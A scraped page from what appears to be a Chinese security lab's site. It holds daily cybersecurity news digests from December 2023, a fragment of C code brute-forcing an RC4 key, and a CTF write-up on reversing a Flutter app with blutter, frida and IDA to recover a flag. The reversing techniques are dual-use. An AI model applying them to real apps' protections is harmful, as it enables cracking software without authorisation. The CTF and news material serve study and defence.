0x7a, 0x7b, 0x7c, 0x7d, 0x7e, 0x7f};    int l_size = sizeof(l) / sizeof(int);    uint8_t key[4];    uint8_t dec[ENC_SIZE];    for (int i = 0; i < l_size; i++) {        for (int j = 0; j < l_size; j++) {            for (int k = 0; k < l_size; k++) {                for (int m = 0; m < l_size; m++) {                    key[0] = l[i];                    key[1] = l[j];                    key[2] = l[k];                    key[3] = l[m];                    ARC4_CTX ctx;                    ARC4_set_key(&ctx, 4, key);                    ARC4(&ctx, ENC_SIZE, enc, dec);                    if (memcmp(dec, XOR_KEY, ENC_SIZE) == 0) {                        printf("get\n");                        printf("%c%c%c%c\n", key[0], key[1], key[2], key[3]);                        exit(0);                   }               }           }       }   }    return 0; } 爆破出秘钥: d4@d
网络安全日报 2023年12月14日
1、Lazarus组织利用Log4j漏洞部署远程访问木马 https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/ Lazarus组织利用Log4j中的安全缺陷,在受感染的主机上部署以前未记录的远程访问木马(RAT)。研究人员正在以“Operation Blacksmith”的名义跟踪该活动,注意到使用了三个基于DLang的恶意软件系列,其中包括一种名为NineRAT的RAT(利用Telegram进行命令和控制 (C2))、DLRAT和一个名为BottomLoader的下载程序。 2、苹果发布安全更新以修补严重的iOS和macOS安全漏洞 https://support.apple.com/en-us/HT201222 苹果周一发布了针对iOS、iPadOS、macOS、tvOS、watchOS和Safari网络浏览器的安全补丁,以解决多个安全漏洞,此外还将针对最近披露的两个零日漏洞的修复程序向后移植到旧设备。其中包括针对iOS和iPadOS中12个安全漏洞的更新,涉及AVEVideoEncoder、ExtensionKit、Find My、ImageIO、Kernel、Safari Private Browsing和WebKit。macOS Sonoma 14.2本身解决了39个缺陷,其中有6个影响ncurses库的错误。其 3、18个恶意贷款应用程序诈骗数百万安卓用户 https://www.welivesecurity.com/en/eset-research/beware-predatory-fintech-loan-sharks-use-android-apps-reach-new-depths/ 网络安全研究人员在Google Play商店中发现了18个安卓恶意贷款应用程序,这些应用程序的总下载量已超过1200万次。尽管这些服务的外表很吸引人,但实际上是为了欺骗用户,向他们提供带有欺骗性描述的高利率贷款,同时收集受害者的个人和财务信息来敲诈他们,最终获得他们的资金。它们旨在针对东南亚、非洲和拉丁美洲的潜在借款人。 4、Sophos 修补 EOL 防火墙严重漏洞以防止被利用 https://www.securityweek.com/sophos-patches-eol-firewalls-against-exploited-vulnerability/ 网络安全公司 Sophos 本周宣布针对已达到生命周期 (EOL) 的防火墙版本中的一个被利用漏洞提供补丁。该严重缺陷(编号为 CVE-2022-3236)被发现影响 19.0 MR1 (19.0.1) 及更早版本的产品。它最初于 2022 年 9 月进行了修补,但仅限于受支持的 Sophos Firewall 版本。 5、BazaCall 网络钓鱼诈骗者利用 Google 表单进行欺骗 https://thehackernews.com/2023/12/bazacall-phishing-scammers-now.html 据观察, BazaCall网络钓鱼攻击背后的威胁行为者利用 Google Forms 为该计划披上可信的外衣。 6、Chrome 120 更新修补高严重性漏洞 https://www.securityweek.com/chrome-120-update-patches-high-severity-vulnerabilities/ Chrome 120 安全更新解决了 9 个漏洞,其中包括外部报告的 5 个高严重性缺陷。 7、CS2游戏中的 HTML 注入漏洞暴露了玩家 IP 地址 https://www.bleepingcomputer.com/news/security/counter-strike-2-html-injection-bug-exposes-players-ip-addresses/ Valve 修复了 CS2 中的一个 HTML 注入缺陷,该缺陷如今被严重滥用,将图像注入游戏并获取其他玩家的 IP 地址。 8、冷藏企业巨头 Americold 遭受勒索软件攻击 https://therecord.media/ransomware-attack-on-americold-cold-storage 该公司近日披露,4 月份针对公司的勒索软件攻击影响了近 13 万人。 9、Apple 测试 iPhone 的新被盗设备保护功能 https://www.securityweek.com/apple-testing-new-stolen-device-protection-feature-for-iphones/ 苹果正在测试一项新的安全功能,该功能将限制 iPhone 窃贼对被盗手机的操作,即使他们拥有密码。 10、俄乌网络战再升级:乌克兰全国断网、俄罗斯税务系统瘫痪 https://www.secrss.com/articles/61696 本周俄乌网络战全面升级,双方的网络攻击火力全开,给对方的关键基础设施造成了开战以来损失最为惨重,影响最为深远的沉重打击。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年12月13日
1、研究人员披露AutoSpill攻击可从安卓密码管理器窃取凭据 https://www.blackhat.com/eu-23/briefings/schedule/index.html#autospill-zero-effort-credential-stealing-from-mobile-password-managers-34420 安全研究人员开发了一种新的攻击,他们将其命名为AutoSpill,在自动填充操作期间窃取安卓上的帐户凭据。研究人员表示,他们的测试表明,即使没有JavaScript注入,大多数安卓密码管理器也容易受到AutoSpill的攻击。安卓应用程序通常使用WebView控件来呈现Web内容,例如应用程序内的登录页面,而不是将用户 2、研究人员称超过一半的内部攻击使用特权提升漏洞 https://www.crowdstrike.com/blog/how-malicious-insiders-use-known-vulnerabilities-against-organizations/ 特权提升缺陷是企业内部人员在网络上进行未经授权的活动时最常见的漏洞,无论是出于恶意目的还是以危险的方式下载有风险的工具。根据2021年1月至2023年4月期间收集的数据发布的一份报告显示,内部威胁正在上升,而利用权限升级漏洞是未经授权活动的重要组成部分。该报告称,该公司记录的内部威胁中有55%依赖于权限升级漏洞,而其余45%通过下载或滥用攻击性工具无意中引入了风险。利用权限升级漏洞来获 3、研究人员发现针对主要金融机构的加密npm恶意软件包 https://blog.phylum.io//encrypted-npm-packages-found-targeting-major-financial-institution/ 2023年11月上旬,研究人员开始跟踪npm上的可疑出版物。有问题的包包含一个加密的blob,该blob似乎是针对目标计算机的密钥:只有使用一些本地计算机信息和解密密钥才能解密。然后将解密的blob传递给eval(...)执行。研究人员解密此负载,发现密钥是一家主要金融机构的domain.tld。此解密的有效负载包含一个嵌入的二进制文件,该二进制文件巧妙地将用户凭据泄露到相关目标公司内部的Microsoft T 4、网络攻击使乌克兰最大的电信运营商陷入瘫痪 https://www.securityweek.com/cyberattack-cripples-ukraines-largest-telcom-operator/ 乌克兰最大的移动网络运营商 Kyivstar 周二遭受大规模网络攻击,导致数百万公民的移动和互联网通信中断。 5、微软周二补丁日:修复严重的欺骗和远程代码执行漏洞 https://www.securityweek.com/microsoft-patch-tuesday-critical-spoofing-and-remote-code-execution-flaws/ 微软周二推出了针对Windows生态系统中几个关键安全漏洞的修复程序,并警告称,黑客可能会针对这些问题来完全控制未打补丁的机器。作为其常规补丁星期二发布的一部分,微软记录了一系列产品中的至少 33 个漏洞,并呼吁紧急关注 MSHTML 平台、Microsoft Power Platform 连接器和 Internet 连接共享 (ICS) 组件中的远程代码执行漏洞。 6、Apple 推出iMessage 联系人密钥验证的新功能以阻止冒充者 https://www.securityweek.com/apple-sets-trap-to-catch-imessage-impersonators/ Apple 最新的 iOS 和 macOS 平台更新带来的不仅仅是紧急安全补丁。该公司激活了一项名为iMessage 联系人密钥验证的新功能,以阻止冒充者和复杂的威胁行为者滥用其 iMessage 服务器基础设施。 7、西门子和施耐德电气解决了影响其工业产品的数十个漏洞 https://www.securityweek.com/ics-patch-tuesday-electromagnetic-fault-injection-critical-redis-vulnerability/ 西门子和施耐德电气发布了 2023 年 12 月的周二补丁公告,解决了影响其产品的数十个漏洞。 8、乌克兰军事情报部门入侵俄罗斯联邦税务局 https://securityaffairs.com/155727/cyber-warfare-2/ukraine-hacked-russian-federal-taxation-service.html 乌克兰国防部主要情报局的黑客宣布他们已经入侵了俄罗斯联邦税务局(FNS),军事情报部门表示,此次黑客攻击是俄罗斯境内一次成功的特别行动的结果。乌克兰国防情报局 (GUR) 感染了俄罗斯税务部门的数千台服务器,并清除了数据库和备份。 9、超过 1,450 个 pfSense 服务器易遭受 Bug 链 RCE 攻击 https://www.bleepingcomputer.com/news/security/over-1-450-pfsense-servers-exposed-to-rce-attacks-via-bug-chain 在线暴露的大约 1,450 个 pfSense 实例容易受到命令注入和跨站点脚本漏洞的攻击,这些漏洞如果链接起来,可能使攻击者能够在设备上执行远程代码。 10、国际航空运输协会:导航系统被攻击导致多架飞机偏离航线 https://www.secrss.com/articles/61594 国际航空运输协会官员表示,鉴于近期网络攻击者误导飞机导航系统,导致飞机偏离航线的事件越来越多,全球航空业巨头计划明年 1 月开会讨论由此引发的安全问题。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
【flutter对抗】blutter使用+ACTF习题
最新的能很好反编译flutter程序的项目 ‍1、安装 git clone https://github.com/worawit/blutter --depth=1 然后我直接将对应的两个压缩包下载下来(通过浏览器手动下载) 不再通过python的代码来下载,之前一直卡在这个地方。 如果读者可以正常运行init_env_win.py,手动这一步可以省略。 cd .\blutter\ python .\scripts\init_env_win.py 再次运行就可以安装成功 ‍ 2、blutter反编译使用 运行该工具,进入目标文件夹 提供libapp.so 和 libflutter.so 的目录 python blutter.py C:\Users\Le\Desktop\flutter\chall\lib\armeabi-v7a .\output 然后报错。。。 但是问题不大,好像是我们的架构不支持,我们换一个 再次运行,发现正在下载对应Dart版本的信息 全程代理! 要不然还会报错 正常情况下: 安装完成后,再次运行命令: 报错:0x22说明权限不够,使用管理员模式运行即可 反编译成功 查看文件目录: 到此,blutter模块反编译flutter成功! ‍ 3、IDA恢复libapp.so符号 拖进IDA64 发现符号全无,不利于我们分析,此时blutter工具的用法就体现出来了 运行生成的脚本: 见证奇迹的时刻到了 ‍ 4、分析 flutter中:onTap函数是按钮点击响应函数,CTF中以此作为入口进行分析 进入1DE500函数 进入分析发现一堆代码 目前不知道什么加密,因为“面目全非”(有256,%符号) 使用blutter生成的frida脚本,对该函数进行hook,观察其返回结果 frida -U -f com.example.flutter_application_1 -l blutter_frida.js hook目标函数 然后发现没有触发 猜测flag长度有限制,后面知道了原来是模拟器有bug,我换了真机才可以 ‍ 得到了比较的数组,也就是密文 Unhandle class id: 46, TypeArguments GrowableList@750038d0f1 = [  188698,  0, {    "key": "Unhandle class id: 46, TypeArguments" },  34, {    "key": [      184,      132,      137,      215,      146,      65,      86,      157,      123,      100,      179,      131,      112,      170,      97,      210,      163,      179,      17,      171,      245,      30,      194,      144,      37,      41,      235,      121,      146,      210,      174,      92,      204,      22   ] },  0,  0,  0 ] ‍ 接下来使用IDA进行so的一个动调 选择same 找到module 运行程序 读者可以使用高级语言来看,为了理解更深刻,我这里采用了汇编来看 ‍ 可以看到比较256次 RC4的经典特征 ‍ 在异或出添加输出断点: 搜索指令  EOR             X5, X3, X2 import idc print(idc.get_reg_value("X2"),",",end="") 拿到异或的所有值 xor = [14, 14, 68, 80, 29, 201, 241, 46, 197, 208, 123, 79, 187, 55, 234, 104, 40, 117, 133, 12, 67, 137, 91, 31, 136,       177, 64, 234, 24, 27, 26, 214, 122, 217] 然后还有密文 这里使用了oacia师傅的脚本 final = [184, 132, 137, 215, 146, 65, 86, 157, 123, 100, 179, 131, 112, 170, 97, 210, 163, 179, 17, 171, 245, 30, 194,         144, 37, 41, 235, 121, 146, 210, 174, 92, 204, 22] xor = [14, 14, 68, 80, 29, 201, 241, 46, 197, 208, 123, 79, 187, 55, 234, 104, 40, 117, 133, 12, 67, 137, 91, 31, 136,       177, 64, 234, 24, 27, 26, 214, 122, 217] flag = [chr(xor[i]^final[i]^0xff) for i in range(len(final))] print(''.join(flag)) 感谢oacia师傅的分享 ‍
网络安全日报 2023年12月12日
1、Kimsuky组织针对韩国研究机构进行后门攻击 https://asec.ahnlab.com/en/59387/ Kimsuky的朝鲜攻击者将韩国的研究机构作为鱼叉式网络钓鱼活动的一部分,其最终目标是在受感染的系统上分发后门。攻击者最终会利用后门窃取信息并执行命令。攻击链以导入声明诱饵开始,该诱饵实际上是一个恶意JSE文件,其中包含混淆的PowerShell脚本、Base64编码的有效负载和诱饵PDF文档。下一阶段需要打开PDF文件作为牵制策略,同时PowerShell脚本在后台执行以启动后门。 2、攻击者通过破解版Mac软件传播的新型Trojan-Proxy恶意软件 https://securelist.com/trojan-proxy-for-macos/111325/ 未经授权的网站分发木马版本的破解软件已被发现使用新的Trojan-Proxy恶意软件感染苹果macOS用户。攻击者可以利用此类恶意软件通过构建代理服务器网络来获取金钱,或代表受害者实施犯罪行为:对网站、公司和个人发起攻击,购买枪支、毒品和其他非法商品。该恶意软件是一种跨平台威胁,因为在Windows和Android上发现了利用盗版工具的工件。macOS变体打着合法多媒体、图像编辑、数据恢复和生产力工具的幌子传播。这表明搜索盗版软件的用户是该活动的目标。与以磁盘映像(.DMG)文件形式提 3、超三成的应用程序使用Log4J库的易受攻击版本 https://www.bleepingcomputer.com/news/security/over-30-percent-of-log4j-apps-use-a-vulnerable-version-of-the-library/ 大约38%使用Apache Log4j库的应用程序使用的版本容易出现安全问题,其中包括Log4Shell,这是一个被识别为CVE-2021-44228的严重漏洞,尽管补丁已经发布了两年多,但其严重程度最高。Log4Shell是一个未经身份验证的远程代码执行漏洞,允许使用Log4j 2.0-beta9和最高版本2.15.0完全控制系统。该漏洞于2021年 12 4、Apple 发布 iOS 17.2 并附带紧急安全补丁 https://www.securityweek.com/apple-ships-ios-17-2-with-urgent-security-patches/ 最新的iOS 17.2 和 iPadOS 17.2包含至少 11 个已记录的安全缺陷的修复程序,其中一些缺陷严重到足以导致任意代码执行或应用程序沙箱逃逸。 5、BlackCat/Alphv 勒索软件泄密网站已被执法部门关闭 https://www.securityweek.com/law-enforcement-reportedly-behind-takedown-of-blackcat-alphv-ransomware-website/ 勒索软件组织 BlackCat 和 Alphv 的官方泄密网站已经离线数天,据信执法部门是此次关闭的幕后黑手。基于 Tor 的BlackCat/Alphv泄露网站自 12 月 7 日起就无法访问。威胁情报公司 RedSense 第二天报告称,该网站已被执法部门关闭。 6、谷歌修补了HardPwn USA 2023中被利用的 Chromecast 漏洞 https://www.securityweek.com/google-patches-chromecast-vulnerabilities-exploited-at-hacking-contest/ 谷歌已经修复了今年早些时候在黑客竞赛中展示的几个高度和中等严重程度的 Chromecast 漏洞。 7、Apache 修补 Struts 2 中的关键 RCE 漏洞 https://www.securityweek.com/apache-patches-critical-rce-vulnerability-in-struts-2/ Apache 软件基金会周末宣布了安全更新,解决了 Struts 2 开源开发框架中的一个严重性文件上传漏洞,并警告称该漏洞可能被利用来远程执行任意代码。该问题编号为CVE-2023-50164,被描述为文件上传逻辑中的缺陷,可能允许“攻击者启用具有遍历的路径”。尚未公布任何技术细节。Apache 在其公告中解释道:“攻击者可以操纵文件上传参数来实现路径遍历,在某些情况下,这可能会导致上传可用于执行远程代码执行的恶意文件。” 8、丰田金融服务公司披露数据泄露事件 丰田金融服务公司 (TFS) 披露了一起数据泄露事件,威胁行为者访问了其敏感的个人和财务数据。 9、日本汽车制造商Nissan遭遇网络攻击 https://securityaffairs.com/155360/security/nissan-oceania-suffers-cyberattack.html 日产大洋洲宣布遭受了网络攻击,并对此事件展开了调查。公司称已经通知了澳大利亚网络安全中心和新西兰国家网络安全中心。 10、国家网信办《网络安全事件报告管理办法》公开征求意见 https://www.secrss.com/articles/61529 为了规范网络安全事件的报告,减少网络安全事件造成的损失和危害,维护国家网络安全,依据《中华人民共和国网络安全法》等法律法规,国家互联网信息办公室起草了《网络安全事件报告管理办法(征求意见稿)》,现向社会公开征求意见。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年12月11日
1、Meta在Messenger上启动聊天和通话为默认端到端加密 https://about.fb.com/news/2023/12/default-end-to-end-encryption-on-messenger/ Meta已正式开始在Messenger中默认支持个人通话和一对一个人消息的端到端加密(E2EE)。该公司副总裁在社交媒体上称,此次不是例行的安全更新,他们与隐私和安全专家密切协商,从头开始重建了该应用程序。Messenger中群组消息传递的E2EE仍处于测试阶段。Meta升级了100多项功能以纳入加密,还通过构建名为Labyrinth的新加密存储系统,为用户开发了管理设备之间消息历史记录的新方法,例如设置PIN。PIN用作Messenge 2、攻击者可以利用AWS STS渗透云帐户 https://redcanary.com/blog/aws-sts/ 攻击者可以利用Amazon Web Services安全令牌服务(AWS STS)作为渗透云帐户并进行后续攻击的方式。AWS STS是一项Web服务,使用户能够请求临时的、有限权限的凭证,以便用户访问AWS资源,而无需创建AWS身份。这些STS令牌的有效期为15分钟到36小时。攻击者可以通过恶意软件感染、公开暴露的凭据和网络钓鱼电子邮件等多种方法窃取长期IAM令牌,然后通过API调用使用它们来确定与这些令牌关联的角色和权限。 3、攻击者可使用新型蓝牙漏洞控制多平台设备 https://github.com/skysafe/reblog/tree/main/cve-2023-45866 攻击者可能会利用一个关键的蓝牙安全漏洞来控制Android、Linux、macOS和iOS设备。该漏洞编号为CVE-2023-45866,涉及身份验证绕过的情况,该情况使攻击者能够连接到易受影响的设备并注入击键以实现作为受害者的代码执行。多个蓝牙堆栈存在身份验证绕过漏洞,允许攻击者在无需用户确认的情况下连接到可发现的主机并注入击键。 4、研究人员披露针对泰国电信公司的新型Krasue恶意软件 https://www.group-ib.com/blog/krasue-rat/ 自 2021 年以来,攻击者观察到一种名为Krasue的新型的Linux远程访问木马以泰国电信公司为目标,主要用于秘密访问受害者网络。目前尚不清楚用于部署 Krasue 的确切初始访问向量,但怀疑它可能是通过漏洞利用、凭证暴力攻击或作为虚假软件包或二进制文件的一部分下载的。该恶意软件的核心功能是通过一个rootkit实现的,该rootkit伪装成未签名的VMware驱动程序,并允许其在主机上保持持久性而不引起任何注意。Rootkit源自Diamorphine、Suterusu和Rooty等开源项目。 5、研究人员披露BlueNoroff组织针对macOS用户的新恶意软件 https://securelist.com/bluenoroff-new-macos-malware/111290/ 研究人员发现了一种针对macOS的新型恶意加载程序,可能与BlueNoroff APT组织及其正在进行的名为RustBucket的活动有关。攻击者常常会攻击金融组织,特别是其活动与加密货币有任何关系的公司,以及持有加密资产或对该主题感兴趣的个人。有关新加载程序变体的信息首先出现在X以前称为Twitter)帖子中。 6、美国海军承包商Austal承认数据泄露且遭受网络攻击 https://www.bleepingcomputer.com/news/security/navy-contractor-austal-usa-confirms-cyberattack-after-data-leak/ 美国造船公司Austal USA是美国国防部(DoD)和国土安全部(DHS)的承包商,证实遭受了网络攻击,目前正在调查该事件的影响。该公司总部位于澳大利亚,专门生产高性能铝制容器。其美国子公司Austal USA签订了多个项目合同,其中包括为美国海军建造独立级濒海战斗舰,这些舰艇长127米,每艘造价3.6亿美元。Austal还拥有一份价值33亿美元的有效合同,为美国海岸警 7、Atlassian修复多个产品中的关键远程代码执行漏洞 https://confluence.atlassian.com/security/security-advisories-bulletins-1236937381.html Atlassian发布了针对影响Confluence、Jira和Bitbucket服务器以及macOS配套应用程序的四个关键远程代码执行(RCE)漏洞的安全公告。根据Atlassian的内部评估,所有解决的安全问题的严重程度至少为9.0分(满分10分)。不过,该公司建议企业根据自己的IT环境评估适用性。该公司没有将任何安全问题标记为在野外被利用。然而,由于Atlassian产品的流行及其在企业环境中的广泛部署,系统管理 8、研究人员发现了ANDROID 14 和 13 的锁屏绕过漏洞 https://securityaffairs.com/155588/hacking/android-14-13-lock-screen-bypass.html 研究人员在 Android 14 和 13 中发现了一个锁屏绕过漏洞,可能会泄露用户 Google 帐户中的敏感数据。 9、新的 5G 调制解调器漏洞影响主要品牌的Android手机和 iOS 设备 https://thehackernews.com/2023/12/new-5g-modems-flaws-affect-ios-devices.html 联发科和高通等主要芯片组供应商的 5G 移动网络调制解调器固件实现中存在一系列安全漏洞,影响 USB 和物联网调制解调器以及数百种运行 Android 和 iOS 的智能手机型号。 10、俄罗斯Fancy Bear组织发起大规模凭证收集活动 https://www.csoonline.com/article/1251293/russias-fancy-bear-launches-mass-credential-collection-campaigns-exploiting-outlook-and-winrar-flaws.html 俄罗斯军事情报部门相关的威胁组织Fancy Bear发起大规模凭证收集活动,这些攻击活动利用Outlook和WinRAR中的已知漏洞从欧洲和北美的组织收集Windows NTLM凭据哈希值。对于网络间谍组织来说,大量电子邮件的发送是不寻常的,因为网络间谍组织在选择受害者时通常具有高度针对性。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页